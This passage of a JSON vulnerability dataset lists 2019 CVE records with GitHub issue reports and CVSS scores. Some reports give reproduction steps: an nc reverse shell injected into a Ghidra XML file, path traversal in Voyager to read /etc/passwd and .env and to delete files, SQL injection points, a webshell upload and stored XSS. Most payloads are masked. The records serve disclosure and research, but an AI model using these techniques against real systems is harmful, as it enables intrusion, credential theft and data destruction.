  39346. "description": "RCE possible in Function Bit Patterns Explorer Plugin. Description: APITAG is used in APITAG which allows Remote Code Execution in the Bit Patterns Explorer Plugin. Steps to reproduce the behavior NUMBERTAG Open a binary with APITAG NUMBERTAG Go to Window APITAG Manager and select the APITAG NUMBERTAG Export the resulting XML file NUMBERTAG Add the following at the end of the file, after the closing tag of the last object and before the APITAG closing tag: APITAG APITAG APITAG nc APITAG NUMBERTAG c PATHTAG APITAG APITAG APITAG NUMBERTAG Open local listening server with : \"nc lvnp NUMBERTAG Go to Window APITAG Bit Patterns Explorer (you will need to enable experimental mode from configuration first File APITAG NUMBERTAG In the opened plugin window, click APITAG XML Files\", point to the directory where the XML file was saved and click OK NUMBERTAG Go back to the listener and see the shell opened. Expected behavior No code should be executed while running this plugin. Environment: OS: Kali Linu NUMBERTAG Java Version NUMBERTAG Ghidra Version NUMBERTAG",
  39347. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39348. "severity": "CRITICAL",
  39349. "baseScore": 9.8,
  39350. "impactScore": 5.9,
  39351. "exploitabilityScore": 3.9
  39352. },
  39353. {
  39354. "CVE_ID": "CVE-2019-16942",
  39355. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2478",
  39356. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2478",
  39357. "Repo_new": "fasterxml/jackson-databind",
  39358. "Issue_Created_At": "2019-09-27T15:44:21Z",
  39359. "description": "Block two new serialization gadgets . Hi, there. Recently, I found two new gadgets can be used to exploit jackson which can cause RCE vulnerability. I had sent the report to EMAILTAG . Cheers!",
  39360. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39361. "severity": "CRITICAL",
  39362. "baseScore": 9.8,
  39363. "impactScore": 5.9,
  39364. "exploitabilityScore": 3.9
  39365. },
  39366. {
  39367. "CVE_ID": "CVE-2019-16992",
  39368. "Issue_Url_old": "https://github.com/keybase/keybase-issues/issues/3583",
  39369. "Issue_Url_new": "https://github.com/keybase/keybase-issues/issues/3583",
  39370. "Repo_new": "keybase/keybase-issues",
  39371. "Issue_Created_At": "2019-09-29T21:01:23Z",
  39372. "description": "Keybase iOS has a backdoor that signs proofs against my knowledge and consent. URLTAG I don't want XLM shitcoins. I don't want anyone to send me XLM shitcoins thinking I want them. I don't hold any private keys for XLM shitcoins. Somehow, an attestation URLTAG has found its way onto my profile, signed by one of my devices by the Keybase iOS client. I did not want this signature generated with my keys. Indeed, it happened without my knowledge or consent. I am unable to revoke this from my keybase profile.",
  39373. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  39374. "severity": "HIGH",
  39375. "baseScore": 7.5,
  39376. "impactScore": 3.6,
  39377. "exploitabilityScore": 3.9
  39378. },
  39379. {
  39380. "CVE_ID": "CVE-2019-16996",
  39381. "Issue_Url_old": "https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/1",
  39382. "Issue_Url_new": "https://github.com/xiaokuoai/xiaokuoai.github.io/issues/1",
  39383. "Repo_new": "XiaOkuoAi/XiaOkuoAi.github.io",
  39384. "Issue_Created_At": "2019-09-29T13:07:55Z",
  39385. "description": "Metinfocms NUMBERTAG SQL\u6ce8\u5165\uff08\u6700\u65b0\u7248\u672c)\u7b2c\u4e00\u679a. \u4e8c\u3001\u6f0f\u6d1e\u6982\u8ff0 \u5168\u5c40\u641c\u7d22 where PATHTAG ERRORTAG \u53d1\u73b0 APITAG \u76f4\u63a5\u88ab\u62fc\u63a5\u8fdbsql\u8bed\u53e5\uff0c\u4e14 listid \u662f\u51fd\u6570\u76f4\u63a5\u4f20\u8fdb\u6765\u7684\u53c2\u6570\uff0c\u641c\u7d22\u54ea\u4e9b\u51fd\u6570\u8c03\u7528\u4e86\u8fd9\u4e2a\u51fd\u6570 FILETAG \u4e09\u3001\u5229\u7528\u4ee3\u7801 POC: ERRORTAG",
  39386. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  39387. "severity": "HIGH",
  39388. "baseScore": 7.2,
  39389. "impactScore": 5.9,
  39390. "exploitabilityScore": 1.2
  39391. },
  39392. {
  39393. "CVE_ID": "CVE-2019-16997",
  39394. "Issue_Url_old": "https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/2",
  39395. "Issue_Url_new": "https://github.com/xiaokuoai/xiaokuoai.github.io/issues/2",
  39396. "Repo_new": "XiaOkuoAi/XiaOkuoAi.github.io",
  39397. "Issue_Created_At": "2019-09-29T13:08:51Z",
  39398. "description": "Metinfocms NUMBERTAG SQL\u6ce8\u5165\uff08\u6700\u65b0\u7248\u672c\uff09\u7b2c\u4e8c\u679a. \u4e8c\u3001\u6f0f\u6d1e\u6982\u8ff0 PATHTAG ERRORTAG APITAG \u76f4\u63a5\u62fc\u63a5 \u5f53 site \u7b49\u4e8eweb\u6216\u8005admin\u65f6\u9020\u6210sql\u6ce8\u5165 \u627e\u4e0b\u6709\u6ca1\u6709\u8c03\u7528\u8fd9\u4e2a\u51fd\u6570\u4f20\u53c2\u7684 PATHTAG ERRORTAG \u770b\u4e0b\u4ee3\u7801\uff0c\u9996\u5148\u8981\u4f20\u9012\u53c2\u6570 editor \u8df3\u51fa\u7b2c\u4e00\u4e2aif\u8bed\u53e5\u5757\uff0c\u7136\u540e site \u548c appno \u76f4\u63a5\u4f20\u5165 APITAG \u51fd\u6570\uff0c\u53c2\u6570\u90fd\u53ef\u63a7\uff0c\u59a5\u59a5\u7684\u6ce8\u5165\u3002 payload ERRORTAG APITAG FILETAG \u4e09\u3001\u5229\u7528\u4ee3\u7801 POC: ERRORTAG",
  39399. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  39400. "severity": "HIGH",
  39401. "baseScore": 7.2,
  39402. "impactScore": 5.9,
  39403. "exploitabilityScore": 1.2
  39404. },
  39405. {
  39406. "CVE_ID": "CVE-2019-16999",
  39407. "Issue_Url_old": "https://github.com/idcos/Cloudboot/issues/22",
  39408. "Issue_Url_new": "https://github.com/idcos/cloudboot/issues/22",
  39409. "Repo_new": "idcos/cloudboot",
  39410. "Issue_Created_At": "2019-09-05T10:19:46Z",
  39411. "description": "Cloudboot has SQL injection. A sql injection was discovered in cloudboot There is a sql injection vulnerability which allows remote attackers to inject sql command of PATHTAG APITAG POST PATHTAG HTTP NUMBERTAG Host: example.com Content Type: application/x www form urlencoded Content Length NUMBERTAG APITAG by NUMBERTAG APITAG APITAG is the injection point Use sqlmap to get the database FILETAG",
  39412. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39413. "severity": "CRITICAL",
  39414. "baseScore": 9.8,
  39415. "impactScore": 5.9,
  39416. "exploitabilityScore": 3.9
  39417. },
  39418. {
  39419. "CVE_ID": "CVE-2019-17050",
  39420. "Issue_Url_old": "https://github.com/the-control-group/voyager/issues/4322",
  39421. "Issue_Url_new": "https://github.com/the-control-group/voyager/issues/4322",
  39422. "Repo_new": "the-control-group/voyager",
  39423. "Issue_Created_At": "2019-08-08T02:14:59Z",
  39424. "description": "Security: critical vulnerability in Voyager Compass. Version information Laravel NUMBERTAG oyager NUMBERTAG PHP NUMBERTAG Database: APITAG NUMBERTAG Description During pentesting some projects, i found critical vulnerability in Voyager Compass. This vulnerability can give to anyone, who has permission to use compass, power of download and delete every file in the system if the user has permission for this operation in the system. This means, bad guy can steal .env file of your application and sign his own new session and cookie with secret application key or just drop your database knowing username and password of the database. How can you reproduce it? It's very easy. Voyager Compass has two GET parameters: download and del. They are used for download and deleting error logs in the directory 'logs'. If you want to read or delete file out of this directory you can't just type absolute path to this file, because this feature was fixed. To bypass this, you have to use path traversal trick. Now you make a get request like \" URLTAG {download/del}=path_to_file\", where path to file is base NUMBERTAG encode path in format like PATHTAG e.g. i want to download very sensitive file /etc/passwd, so i construct path to it with path traversal trick PATHTAG in base NUMBERTAG encode APITAG and now i can download passwd from the server: \" URLTAG \". Another example is .env file of your application. You can easily download it with \"../.env\" path to it. Request to it is: \" URLTAG \". Same thing with del parameter to delete these files from server: \" URLTAG \" and \" URLTAG \". You can do this with any file on the server. How to fix it This vulnerability has a high criticality and a CVSS score estimate to NUMBERTAG To fix it, i recommend checking that the final directory of the path is a directory that exists inside the logs directory.",
  39425. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  39426. "severity": "HIGH",
  39427. "baseScore": 7.2,
  39428. "impactScore": 5.9,
  39429. "exploitabilityScore": 1.2
  39430. },
  39431. {
  39432. "CVE_ID": "CVE-2019-17073",
  39433. "Issue_Url_old": "https://github.com/emlog/emlog/issues/49",
  39434. "Issue_Url_new": "https://github.com/emlog/emlog/issues/49",
  39435. "Repo_new": "emlog/emlog",
  39436. "Issue_Created_At": "2019-09-30T01:32:34Z",
  39437. "description": "emlog discover any file deletion vulnerability again!. vulnerability in FILETAG line NUMBERTAG ERRORTAG > if (true === APITAG . APITAG tracking APITAG function: ERRORTAG Unrestricted character \u201c../\u201d Login management background and view APITAG PATHTAG &token=U login token! POC: APITAG",
  39438. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  39439. "severity": "MEDIUM",
  39440. "baseScore": 6.5,
  39441. "impactScore": 3.6,
  39442. "exploitabilityScore": 2.8
  39443. },
  39444. {
  39445. "CVE_ID": "CVE-2019-17074",
  39446. "Issue_Url_old": "https://github.com/dayrui/xunruicms/issues/2",
  39447. "Issue_Url_new": "https://github.com/dayrui/xunruicms/issues/2",
  39448. "Repo_new": "dayrui/xunruicms",
  39449. "Issue_Created_At": "2019-09-30T08:34:15Z",
  39450. "description": "There is a stored xss in module_category\uff08\u680f\u76ee\u7ba1\u7406\uff09. FILETAG FILETAG FILETAG",
  39451. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  39452. "severity": "MEDIUM",
  39453. "baseScore": 5.4,
  39454. "impactScore": 2.7,
  39455. "exploitabilityScore": 2.3
  39456. },
  39457. {
  39458. "CVE_ID": "CVE-2019-17091",
  39459. "Issue_Url_old": "https://github.com/eclipse-ee4j/mojarra/issues/4556",
  39460. "Issue_Url_new": "https://github.com/eclipse-ee4j/mojarra/issues/4556",
  39461. "Repo_new": "eclipse-ee4j/mojarra",
  39462. "Issue_Created_At": "2019-04-03T14:29:47Z",
  39463. "description": "HIGH LEVEL VULNERABILITY WITHIN ORACLE MOJARRA JSF NUMBERTAG This is a security bug. Please fix it in accordance with: PATHTAG Dear Oracle team, SEC Consult is a leading consulting company for information security. During a short security crash test we have found a high level security vulnerability within Oracle Mojarra JSF NUMBERTAG The encrypted security advisory with proof of concept information is attached. I have also attached my public PGP and S/MIME keys for further encrypted communication. Please provide us with an estimate on when the vulnerability will be fixed in order to set the actual release date. Please keep us informed if there are any changes. Please also see our attached responsible disclosure policy (PDF) which defines the process of publication of the security advisory. The security advisory will be released according to the chapter NUMBERTAG phase NUMBERTAG APITAG disclosure\", the latest possible release date is NUMBERTAG days from now NUMBERTAG Keep in mind that we can't give any other free support besides providing the security advisory information. Best regards, Jean Benjamin Rousseau Security Consultant",
  39464. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39465. "severity": "MEDIUM",
  39466. "baseScore": 6.1,
  39467. "impactScore": 2.7,
  39468. "exploitabilityScore": 2.8
  39469. },
  39470. {
  39471. "CVE_ID": "CVE-2019-17104",
  39472. "Issue_Url_old": "https://github.com/centreon/centreon/issues/7097",
  39473. "Issue_Url_new": "https://github.com/centreon/centreon/issues/7097",
  39474. "Repo_new": "centreon/centreon",
  39475. "Issue_Created_At": "2019-01-02T18:12:45Z",
  39476. "description": "[security] Unsecured Cookies. APITAG BUG REPORT INFORMATION OS: Centreon Central NUMBERTAG el7 Vulnerability The Apache configuration deployed in the Centreon virtual machine does not protect cookies against eavesdropping nor XSS exfiltrations. The flag APITAG would prevent an attacker from stealing the cookie by eavesdropping on the network, although it would only work if HTTPS was globally enabled which isn't the case right now. The flag APITAG would prevent an attacker from stealing the cookie via an XSS by forbidding APITAG to read cookies.",
  39477. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  39478. "severity": "HIGH",
  39479. "baseScore": 7.5,
  39480. "impactScore": 3.6,
  39481. "exploitabilityScore": 3.9
  39482. },
  39483. {
  39484. "CVE_ID": "CVE-2019-17106",
  39485. "Issue_Url_old": "https://github.com/centreon/centreon/issues/7098",
  39486. "Issue_Url_new": "https://github.com/centreon/centreon/issues/7098",
  39487. "Repo_new": "centreon/centreon",
  39488. "Issue_Created_At": "2019-01-02T18:44:09Z",
  39489. "description": "FILETAG",
  39490. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  39491. "severity": "MEDIUM",
  39492. "baseScore": 6.5,
  39493. "impactScore": 3.6,
  39494. "exploitabilityScore": 2.8
  39495. },
  39496. {
  39497. "CVE_ID": "CVE-2019-17175",
  39498. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/443",
  39499. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/443",
  39500. "Repo_new": "joyplus/joyplus-cms",
  39501. "Issue_Created_At": "2019-09-03T07:20:02Z",
  39502. "description": "joyplus cms Cross directory access FILETAG . describe You can view files in other directories across directories url: URLTAG FILETAG Code audit FILETAG",
  39503. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  39504. "severity": "HIGH",
  39505. "baseScore": 7.5,
  39506. "impactScore": 3.6,
  39507. "exploitabilityScore": 3.9
  39508. },
  39509. {
  39510. "CVE_ID": "CVE-2019-17177",
  39511. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/5645",
  39512. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/5645",
  39513. "Repo_new": "freerdp/freerdp",
  39514. "Issue_Created_At": "2019-10-04T11:51:58Z",
  39515. "description": "Potential Memory Leaks on APITAG Dear APITAG I would like to report a potential memory leak on APITAG The problem lies in the way realloc is being used. When a size bigger than the chunk that wants to be reallocated is passed, realloc tries to malloc a bigger size, however in the case that malloc fails (for example, by forcing a big allocation) realloc will return NULL. According to the man page: APITAG APITAG function returns a pointer to the newly allocated memory, which is suitably aligned for any built in type and may be different from ptr, or NULL if the request fails. If size was equal to NUMBERTAG either NULL or a pointer suitable to be passed to APITAG is returned. If APITAG fails, the original block is left untouched; it is not freed or moved.\" The problem occurs when the memory ptr passed to the first argument of realloc is the same as the one used for the result, for example in this case: PATHTAG NUMBERTAG int APITAG = sizeof(REGION NUMBERTAG DATA) + APITAG sizeof(RECTANGLE NUMBERTAG region >data = realloc(region >data, APITAG If the malloc inside that realloc fails, then the original memory chunk will never be freed, but since realloc will return NULL, the pointer to that memory chunk will be lost and a memory leak will occur. We found other NUMBERTAG cases, all could be found here: URLTAG APITAG case where xrealloc should be disregarded since abort is being called on fail) Best Regards, Nico Waisman Semmle Security Team",
  39516. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  39517. "severity": "HIGH",
  39518. "baseScore": 7.5,
  39519. "impactScore": 3.6,
  39520. "exploitabilityScore": 3.9
  39521. },
  39522. {
  39523. "CVE_ID": "CVE-2019-17188",
  39524. "Issue_Url_old": "https://github.com/fecshop/yii2_fecshop/issues/77",
  39525. "Issue_Url_new": "https://github.com/fecshop/yii2_fecshop/issues/77",
  39526. "Repo_new": "fecshop/yii2_fecshop",
  39527. "Issue_Created_At": "2019-08-28T16:33:19Z",
  39528. "description": "Found unrestricted file upload vulnerability. What steps will reproduce the problem? Login the admin page and find a place to upload APITAG image. Intercept the request, change the file extension to APITAG and insert the content of webshell: FILETAG APITAG FILETAG Additional info | Q | A | | | Fecshop version NUMBERTAG PHP version NUMBERTAG Operating system APITAG NUMBERTAG",
  39529. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  39530. "severity": "HIGH",
  39531. "baseScore": 7.2,
  39532. "impactScore": 5.9,
  39533. "exploitabilityScore": 1.2
  39534. },
  39535. {
  39536. "CVE_ID": "CVE-2019-17203",
  39537. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2690",
  39538. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2690",
  39539. "Repo_new": "nilsteampassnet/teampass",
  39540. "Issue_Created_At": "2019-09-30T11:50:49Z",
  39541. "description": "Stored XSS at Search page. Steps to reproduce NUMBERTAG Add a new item to any folder, set a password with XSS payload: ERRORTAG NUMBERTAG Open Search Page, find and click at the item NUMBERTAG That's all. The XSS payload will be triggered. In fact, it will be triggered an infinite number of times if you click on the show password icon. FILETAG",
  39542. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  39543. "severity": "MEDIUM",
  39544. "baseScore": 5.4,
  39545. "impactScore": 2.7,
  39546. "exploitabilityScore": 2.3
  39547. },
  39548. {
  39549. "CVE_ID": "CVE-2019-17204",
  39550. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2689",
  39551. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2689",
  39552. "Repo_new": "nilsteampassnet/teampass",
  39553. "Issue_Created_At": "2019-09-30T11:38:35Z",
  39554. "description": "Stored XSS in KBs field. Steps to reproduce NUMBERTAG Open Knowledge Base, tap on Add a new KB NUMBERTAG Set XSS payload as label name: ERRORTAG NUMBERTAG Add any available item which you want to \"infect NUMBERTAG That's all. Anyone who click at the item will trigger XSS payload FILETAG",
  39555. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  39556. "severity": "MEDIUM",
  39557. "baseScore": 5.4,
  39558. "impactScore": 2.7,
  39559. "exploitabilityScore": 2.3
  39560. },
  39561. {
  39562. "CVE_ID": "CVE-2019-17205",
  39563. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2688",
  39564. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2688",
  39565. "Repo_new": "nilsteampassnet/teampass",
  39566. "Issue_Created_At": "2019-09-30T11:18:56Z",
  39567. "description": "Stored XSS in log of Failed Logins. Steps to reproduce NUMBERTAG Try to login with any password and username like: ERRORTAG NUMBERTAG When an Administrator will see a log of Failed Logins, XSS payload will be executed APITAG version NUMBERTAG FILETAG",
  39568. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39569. "severity": "MEDIUM",
  39570. "baseScore": 6.1,
  39571. "impactScore": 2.7,
  39572. "exploitabilityScore": 2.8
  39573. },
  39574. {
  39575. "CVE_ID": "CVE-2019-17210",
  39576. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/11802",
  39577. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/11802",
  39578. "Repo_new": "armmbed/mbed-os",
  39579. "Issue_Created_At": "2019-11-04T02:48:00Z",
  39580. "description": "The bug of APITAG MQTT. Description of defect URL: URLTAG URLTAG Upstream URL: URLTAG URLTAG The MQTT library is used to receive, parse and send mqtt packet between a broker and a client. The function APITAG is called by the function APITAG to get the length and content of the MQTT topic name. It parses the MQTT input linearly. Once a type length value tuple is parsed, the index is increased correspondingly. The maximum index is restricted by the length of the received packet size, as shown in line NUMBERTAG of the code snippet below. ERRORTAG Note that mqttstring >lenstring.len is a part of user input, which can be manipulated. An attacker can simply change it to a larger value to invalidate the if statement so that the statements from line NUMBERTAG to NUMBERTAG are skipped, leaving the value of mqttstring APITAG default to zero. Later, the value of mqttstring APITAG is assigned to curn (line NUMBERTAG of the code snippet below), which is zero under the attack. In line NUMBERTAG curn is accessed. In an ARM cortex M chip, the value at address NUMBERTAG is actually the initialization value for the MSP register. It is highly dependent on the actual firmware. Therefore, the behavior of the program is unpredictable from this time on. ERRORTAG A malformed MQTT packet may cause unexpected behaviors depending on the value stored at the address zero on the board. Target(s) affected by this defect ? MQTT library of APITAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? Mbed OS MQTT library NUMBERTAG No NUMBERTAG Mbed OS latest release What version(s) of tools are you using. List all that apply (E.g. mbed cli) mbed cli latest version How is this defect reproduced ? Use bug_mqtt NUMBERTAG and bug_mqtt NUMBERTAG as received mqtt packet after mqtt connect and subscribe FILETAG FILETAG",
  39581. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  39582. "severity": "HIGH",
  39583. "baseScore": 7.5,
  39584. "impactScore": 3.6,
  39585. "exploitabilityScore": 3.9
  39586. },
  39587. {
  39588. "CVE_ID": "CVE-2019-17211",
  39589. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/11804",
  39590. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/11804",
  39591. "Repo_new": "armmbed/mbed-os",
  39592. "Issue_Created_At": "2019-11-04T03:10:22Z",
  39593. "description": "The bug2 of APITAG APITAG library. Description of defect Reference: URLTAG URLTAG Function: APITAG URLTAG The APITAG builder is responsible for crafting outgoing APITAG messages. The function APITAG is used to calculate the needed memory for the APITAG message from the sn_coap_hdr_s data structure. Both returned_byte_count and src_coap_msg_ptr >payload_len are of type uint NUMBERTAG t. When added together, the result returned_byte_count will wrap around the maximum as shown in line NUMBERTAG As a result, insufficient buffer is allocated for the corresponding APITAG message. CODETAG c static int NUMBERTAG t APITAG uint NUMBERTAG t option_len, const uint8_t option_ptr, ...) { ... memcpy(dest_packet, option_ptr, option_len); ... } ` In the following, we list other locations which will cause out of bound memory accesses rooted in this vulnerability. URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG Target(s) affected by this defect ? APITAG APITAG library Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) mbed cli latest version How is this defect reproduced ? Use bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG and bug_coap NUMBERTAG as input of demo code in Bug NUMBERTAG URLTAG will trigger bugs. FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG",
  39594. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39595. "severity": "CRITICAL",
  39596. "baseScore": 9.8,
  39597. "impactScore": 5.9,
  39598. "exploitabilityScore": 3.9
  39599. },
  39600. {
  39601. "CVE_ID": "CVE-2019-17212",
  39602. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/11803",
  39603. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/11803",
  39604. "Repo_new": "armmbed/mbed-os",
  39605. "Issue_Created_At": "2019-11-04T03:01:01Z",
  39606. "description": "The bug of APITAG APITAG library. Description of defect Reference: URLTAG URLTAG Function: sn_coap_parser_options_parse URLTAG URLTAG The APITAG parser is responsible for parsing received APITAG packets. The function APITAG parses APITAG input linearly using a while loop. Once an option is parsed in a loop, the current point ( packet_data_pptr) is increased correspondingly. The pointer is restricted by the size of the received buffer, as well as a delimiter byte APITAG as shown in line NUMBERTAG of the code snippet below. CODETAG Unfortunately, inside each while loop, the check of the value of packet_data_pptr is not strictly enforced. More specifically, inside a loop, packet_data_pptr could be increased and then dereferenced without checking. Moreover, there are many other functions in the format of sn_coap_parser_ () that do not check whether the pointer is within the bound of the allocated buffer. All of these lead to heap or stack buffer overflow, depending on how the APITAG packet buffer is allocated. In the following, we list other locations which cause out of bound memory accesses rooted in this vulnerability. URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG Target(s) affected by this defect ? APITAG APITAG library Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) mbed cli latest version How is this defect reproduced ? Using bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG and bug_coap NUMBERTAG as input of demo codes below, previous crash examples in sn_coap_parser.c will be triggered. ERRORTAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG",
  39607. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39608. "severity": "CRITICAL",
  39609. "baseScore": 9.8,
  39610. "impactScore": 5.9,
  39611. "exploitabilityScore": 3.9
  39612. },
  39613. {
  39614. "CVE_ID": "CVE-2019-17225",
  39615. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/845",
  39616. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/845",
  39617. "Repo_new": "intelliants/subrion",
  39618. "Issue_Created_At": "2019-09-20T07:36:13Z",
  39619. "description": "Admin Member JSON Update Stored XSS vulnerability. Test it on version NUMBERTAG First login to the panel with user credentials, Go to the member tab from the left menu. APITAG Username, Full Name, Email are editable with a double click on them. Insert the following payload ERRORTAG XSS alert is triggered. Poc FILETAG Note. Script tags are filtered in the input field. it works at username APITAG Poc NUMBERTAG FILETAG Please fix and filter all input tags. Thank you.",
  39620. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  39621. "severity": "MEDIUM",
  39622. "baseScore": 5.4,
  39623. "impactScore": 2.7,
  39624. "exploitabilityScore": 2.3
  39625. },
  39626. {
  39627. "CVE_ID": "CVE-2019-17263",
  39628. "Issue_Url_old": "https://github.com/libyal/libfwsi/issues/13",
  39629. "Issue_Url_new": "https://github.com/libyal/libfwsi/issues/13",
  39630. "Repo_new": "libyal/libfwsi",
  39631. "Issue_Created_At": "2019-10-01T14:11:34Z",
  39632. "description": "OOB read of NUMBERTAG in libfwsi_extension_block NUMBERTAG ersion: lnkinfo NUMBERTAG ERRORTAG To reproduce: ./lnkinfo FILETAG",
  39633. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
  39634. "severity": "LOW",
  39635. "baseScore": 3.3,
  39636. "impactScore": 1.4,
  39637. "exploitabilityScore": 1.8
  39638. },
  39639. {
  39640. "CVE_ID": "CVE-2019-17264",
  39641. "Issue_Url_old": "https://github.com/libyal/liblnk/issues/38",
  39642. "Issue_Url_new": "https://github.com/libyal/liblnk/issues/38",
  39643. "Repo_new": "libyal/liblnk",
  39644. "Issue_Created_At": "2019-09-13T07:58:33Z",
  39645. "description": "heap buffer overflow in APITAG As I understand from issue NUMBERTAG the bug was patched in commit NUMBERTAG b NUMBERTAG a3 but while fuzzing lnkinfo from the master branch, I still encounter this issue. I compiled liblnk with gcc and g++ enabling ASAN; the fuzzing results showed me a heap buffer overflow in APITAG ASAN ERRORTAG I've attached FILETAG for reference, I also observed the program doesn't return any SEGFAULT when I pass the above corpus APITAG ASAN). Request maintainer to please have a look or suggest if I am missing something here.",
  39646. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
  39647. "severity": "LOW",
  39648. "baseScore": 3.3,
  39649. "impactScore": 1.4,
  39650. "exploitabilityScore": 1.8
  39651. },
  39652. {
  39653. "CVE_ID": "CVE-2019-17267",
  39654. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2460",
  39655. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2460",
  39656. "Repo_new": "fasterxml/jackson-databind",
  39657. "Issue_Created_At": "2019-09-17T06:34:14Z",
  39658. "description": "May be a new default typing gadget. Hey, buddy. I may have found a new gadget can be used to exploit jackson which can cause RCE. I have sent the report to EMAILTAG",
  39659. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39660. "severity": "CRITICAL",
  39661. "baseScore": 9.8,
  39662. "impactScore": 5.9,
  39663. "exploitabilityScore": 3.9
  39664. },
  39665. {
  39666. "CVE_ID": "CVE-2019-17268",
  39667. "Issue_Url_old": "https://github.com/beenhero/omniauth-weibo-oauth2/issues/36",
  39668. "Issue_Url_new": "https://github.com/beenhero/omniauth-weibo-oauth2/issues/36",
  39669. "Repo_new": "beenhero/omniauth-weibo-oauth2",
  39670. "Issue_Created_At": "2019-10-09T12:17:49Z",
  39671. "description": "CVETAG report for omniauth weibo oauth2. Hey, I took the liberty of reporting the malicious code injection in APITAG into the CVE database. FILETAG Just wanted to let you know. They initially assigned the APITAG .",
  39672. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39673. "severity": "CRITICAL",
  39674. "baseScore": 9.8,
  39675. "impactScore": 5.9,
  39676. "exploitabilityScore": 3.9
  39677. },
  39678. {
  39679. "CVE_ID": "CVE-2019-17352",
  39680. "Issue_Url_old": "https://github.com/jfinal/jfinal/issues/171",
  39681. "Issue_Url_new": "https://github.com/jfinal/jfinal/issues/171",
  39682. "Repo_new": "jfinal/jfinal",
  39683. "Issue_Created_At": "2019-08-13T06:36:58Z",
